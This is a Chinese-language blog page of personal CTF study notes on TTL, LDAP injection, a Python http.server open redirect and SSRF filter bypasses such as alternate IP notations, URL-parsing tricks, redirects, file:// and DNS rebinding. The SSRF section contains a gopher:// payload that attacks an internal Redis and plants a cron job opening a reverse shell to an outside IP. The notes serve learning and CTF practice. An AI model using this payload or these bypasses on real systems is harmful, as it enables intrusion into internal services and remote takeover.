<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="记录些小的知识盲区">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="琐碎知识点记录">
<meta property="og:url" content="http://Merl1ng.com/2018/08/18/琐碎知识点记录/index.html">
<meta property="og:site_name" content="Merl1ng's blog">
<meta property="og:description" content="记录些小的知识盲区">
<meta property="og:updated_time" content="2018-08-21T14:15:18.543Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="琐碎知识点记录">
<meta name="twitter:description" content="记录些小的知识盲区">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://Merl1ng.com/2018/08/18/琐碎知识点记录/"/>





  <title>琐碎知识点记录 | Merl1ng's blog</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Merl1ng's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://Merl1ng.com/2018/08/18/琐碎知识点记录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Merl1ng">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Merl1ng's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">琐碎知识点记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-08-18T18:48:25+08:00">
                2018-08-18
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>记录些小的知识盲区<br><a id="more"></a></p>
<h3 id="py3的base85"><a href="#py3的base85" class="headerlink" title="py3的base85"></a>py3的base85</h3><h3 id="curl可以访问ftp"><a href="#curl可以访问ftp" class="headerlink" title="curl可以访问ftp"></a>curl可以访问ftp</h3><h3 id="ping中ttl"><a href="#ping中ttl" class="headerlink" title="ping中ttl"></a>ping中ttl</h3><p><a href="http://blog.evalbug.com/2015/10/09/timetolive/" target="_blank" rel="external">http://blog.evalbug.com/2015/10/09/timetolive/</a></p>
<p>全名为 Time to Live</p>
<p>最初这个字段是每经过一个路由器，就减去在这台路由器上数据转发消耗的时间的整数值，就是说每个路由器上减的不一样。然后科技就发展嘛，现在那种转发数据包会花上1秒钟以上的古董路由器已经几乎没有了，所以每经过一个路由器，这个值都是减1</p>
<p>目前这个字段的含义已经变成了跳数计数器了</p>
<p>Ping 命令里面显示给你看的那个 TTL ，并不是你发出去的数据包的 TTL ，而是和你通信的对方，他设定的初值，然后一路走到你这，扣了多少税之后，剩下的那个数字</p>
<h3 id="ldap注入会报错-Bad-searvh-filter"><a href="#ldap注入会报错-Bad-searvh-filter" class="headerlink" title="ldap注入会报错 Bad searvh filter"></a>ldap注入会报错 Bad searvh filter</h3><p>可以试试 <code>*</code> <code>*</code>登陆</p>
<h3 id="py-http服务的任意URL跳转漏洞"><a href="#py-http服务的任意URL跳转漏洞" class="headerlink" title="py http服务的任意URL跳转漏洞"></a>py http服务的任意URL跳转漏洞</h3><p>直接用python3 -m http.server启动一个HTTP服务器</p>
<p>访问<a href="http://127.0.0.1:8000//example.com/%2f%2e%2e即可发现跳转到了http://example.com/%2f../" target="_blank" rel="external">http://127.0.0.1:8000//example.com/%2f%2e%2e即可发现跳转到了http://example.com/%2f../</a></p>
<p>如何发现呢 可以看题目中有没有SimpleHTTPServer SimpleHTTPRequestHandler等关键字</p>
<p>起因真是飘零师傅的文章中whitehat ctf上有类似的例子 让后有趣ph师傅博客看了看文章</p>
<p><a href="https://www.leavesongs.com/PENETRATION/python-http-server-open-redirect-vulnerability.html" target="_blank" rel="external">https://www.leavesongs.com/PENETRATION/python-http-server-open-redirect-vulnerability.html</a></p>
<p>Python框架web.py在处理静态文件的代码中继承并使用了SimpleHTTPRequestHandler类，所以也会受到影响</p>
<p>但利用好像比较受限制</p>
<p>顺便一提 web.py和django一样也是个pythonweb的框架。。这名字好奇怪</p>
<p>话说飘零师傅文章中又提到了web.py 世界果然是圆的hhh</p>
<h3 id="ssrf-bypass"><a href="#ssrf-bypass" class="headerlink" title="ssrf bypass"></a>ssrf bypass</h3><p><a href="http://www.freebuf.com/articles/web/135342.html" target="_blank" rel="external">http://www.freebuf.com/articles/web/135342.html</a><br>这篇文章总结的挺好的 有几个点格外引人注意</p>
<h4 id="更改IP地址写法"><a href="#更改IP地址写法" class="headerlink" title="更改IP地址写法"></a>更改IP地址写法</h4><p>一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP，如采用如下正则表达式：</p>
<pre><code>^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$

^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
</code></pre><p>对于这种过滤我们可以采用改编IP的写法的方式进行绕过，例如192.168.0.1这个IP地址我们可以改写成：</p>
<pre><code>(1)、8进制格式：0300.0250.0.1

(2)、16进制格式：0xC0.0xA8.0.1

(3)、10进制整数格式：3232235521

(4)、16进制整数格式：0xC0A80001
</code></pre><p>rectf上就是 还有hitcon上四字节getshell的</p>
<h4 id="利用解析URL所出现的问题"><a href="#利用解析URL所出现的问题" class="headerlink" title="利用解析URL所出现的问题"></a>利用解析URL所出现的问题</h4><p>在某些情况下，后端程序可能会对访问的URL进行解析，对解析出来的host地址进行过滤。这时候可能会出现对URL参数解析不当，导致可以绕过过滤。</p>
<p><a href="http://www.baidu.com@192.168.0.1/" target="_blank" rel="external">http://www.baidu.com@192.168.0.1/</a></p>
<p>当后端程序通过不正确的正则表达式（比如将http之后到com为止的字符内容，也就是www.baidu.com，认为是访问请求的host地址时）对上述URL的内容进行解析的时候，很有可能会认为访问URL的host为www.baidu.com，而实际上这个URL所请求的内容都是192.168.0.1上的内容</p>
<p>这个方式好眼熟 lctf2017上有个curl的好像这种方法也能过 orange大师傅好像也分享过类似的</p>
<h4 id="利用302跳转"><a href="#利用302跳转" class="headerlink" title="利用302跳转"></a>利用302跳转</h4><p>如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，我们这个时候可以使用302跳转的方式来进行绕过。</p>
<p>(1)、在网络上存在一个很神奇的服务，<strong><a href="http://xip.io" target="_blank" rel="external">http://xip.io</a></strong> 当我们访问这个网站的子域名的时候，例如192.168.0.1.xip.io，就会自动重定向到192.168.0.1。</p>
<p>这个在hctf2016也看到了<br><a href="http://www.freebuf.com/articles/web/121778.html" target="_blank" rel="external">http://www.freebuf.com/articles/web/121778.html</a></p>
<p>(2)、由于上述方法中包含了192.168.0.1这种内网IP地址，可能会被正则表达式过滤掉，我们可以通过短地址的方式来绕过。经过测试发现新浪，百度的短地址服务并不支持IP模式，所以这里使用的是<a href="http://tinyurl.com所提供的短地址服务" target="_blank" rel="external">http://tinyurl.com所提供的短地址服务</a></p>
<p>同样的，我们也可以自行写一个跳转的服务接口来实现类似的功能</p>
<p>大概是<a href="http://xxxxx/?u=http://127.0.0.1" target="_blank" rel="external">http://xxxxx/?u=http://127.0.0.1</a></p>
<p>在有域名的vps上写一个跳转页面实现</p>
<h4 id="通过各种非HTTP协议："><a href="#通过各种非HTTP协议：" class="headerlink" title="通过各种非HTTP协议："></a>通过各种非HTTP协议：</h4><p>如果服务器端程序对访问URL所采用的协议进行验证的话，可以通过非HTTP协议来进行利用。</p>
<p>(1)、GOPHER协议：通过GOPHER我们在一个URL参数中构造Post或者Get请求，从而达到攻击内网应用的目的。例如我们可以<strong>使用GOPHER协议对与内网的Redis服务进行攻击</strong>，可以使用如下的URL：</p>
<p>gopher://127.0.0.1:6379/_<em>1%0d%0a$8%0d%0aflushall%0d%0a</em>3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a<em>/1</em> <em> </em> <em> bash -i &gt;&amp; /dev/tcp/172.19.23.228/23330&gt;&amp;1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a</em>4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a<em>4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a</em>1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a</p>
<p>没错 又见到 gopher 结合 ssrf 打redis 之前也记录过打mysql的</p>
<p>(2)、<strong>File协议</strong>：File协议主要用于访问本地计算机中的文件，我们可以通过类似file:///文件路径这种格式来访问计算机本地文件。使用file协议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过file:///d:/1.txt 来访问D盘中1.txt的内容</p>
<p>file协议这东西以前不重视 这次网鼎反序列化读文件压根没想到要结合file协议</p>
<h4 id="DNS-Rebinding"><a href="#DNS-Rebinding" class="headerlink" title="DNS Rebinding"></a>DNS Rebinding</h4><p>(1)、服务器端获得URL参数，进行第一次DNS解析，获得了一个非内网的IP</p>
<p>(2)、对于获得的IP进行判断，发现为非黑名单IP，则通过验证</p>
<p>(3)、服务器端对于URL进行访问，由于DNS服务器设置的TTL为0，所以再次进行DNS解析，这一次DNS服务器返回的是内网地址。</p>
<p>(4)、由于已经绕过验证，所以服务器端返回访问内网资源的结果。</p>
<p>这方法看的不太懂但那个ttl很感兴趣hhh 刚刚记录过</p>
<h3 id="python和django的目录遍历漏洞"><a href="#python和django的目录遍历漏洞" class="headerlink" title="python和django的目录遍历漏洞"></a>python和django的目录遍历漏洞</h3><p><a href="http://www.lijiejie.com/python-django-directory-traversal/" target="_blank" rel="external">http://www.lijiejie.com/python-django-directory-traversal/</a></p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>见到了就来写点 写着写着发现很多知识点之间是有关联的 web真是有趣啊orz</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/18/sqlbypass小结/" rel="next" title="sqlbypass小结">
                <i class="fa fa-chevron-left"></i> sqlbypass小结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/17/pwn栈溢出从放弃到放弃/" rel="prev" title="pwn栈溢出从放弃到放弃">
                pwn栈溢出从放弃到放弃 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Merl1ng" />
          <p class="site-author-name" itemprop="name">Merl1ng</p>
           
              <p class="site-description motion-element" itemprop="description">Love life , love gakki !</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">69</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Merl1ng" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/Merl1ng" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#py3的base85"><span class="nav-number">1.</span> <span class="nav-text">py3的base85</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#curl可以访问ftp"><span class="nav-number">2.</span> <span class="nav-text">curl可以访问ftp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ping中ttl"><span class="nav-number">3.</span> <span class="nav-text">ping中ttl</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ldap注入会报错-Bad-searvh-filter"><span class="nav-number">4.</span> <span class="nav-text">ldap注入会报错 Bad searvh filter</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#py-http服务的任意URL跳转漏洞"><span class="nav-number">5.</span> <span class="nav-text">py http服务的任意URL跳转漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf-bypass"><span class="nav-number">6.</span> <span class="nav-text">ssrf bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#更改IP地址写法"><span class="nav-number">6.1.</span> <span class="nav-text">更改IP地址写法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用解析URL所出现的问题"><span class="nav-number">6.2.</span> <span class="nav-text">利用解析URL所出现的问题</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用302跳转"><span class="nav-number">6.3.</span> <span class="nav-text">利用302跳转</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过各种非HTTP协议："><span class="nav-number">6.4.</span> <span class="nav-text">通过各种非HTTP协议：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS-Rebinding"><span class="nav-number">6.5.</span> <span class="nav-text">DNS Rebinding</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python和django的目录遍历漏洞"><span class="nav-number">7.</span> <span class="nav-text">python和django的目录遍历漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#其他"><span class="nav-number">8.</span> <span class="nav-text">其他</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Merl1ng</span>
</div>


<div class="powered-by">
   Love life 
</div>

<div class="theme-info">
  Love gakki 
  
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>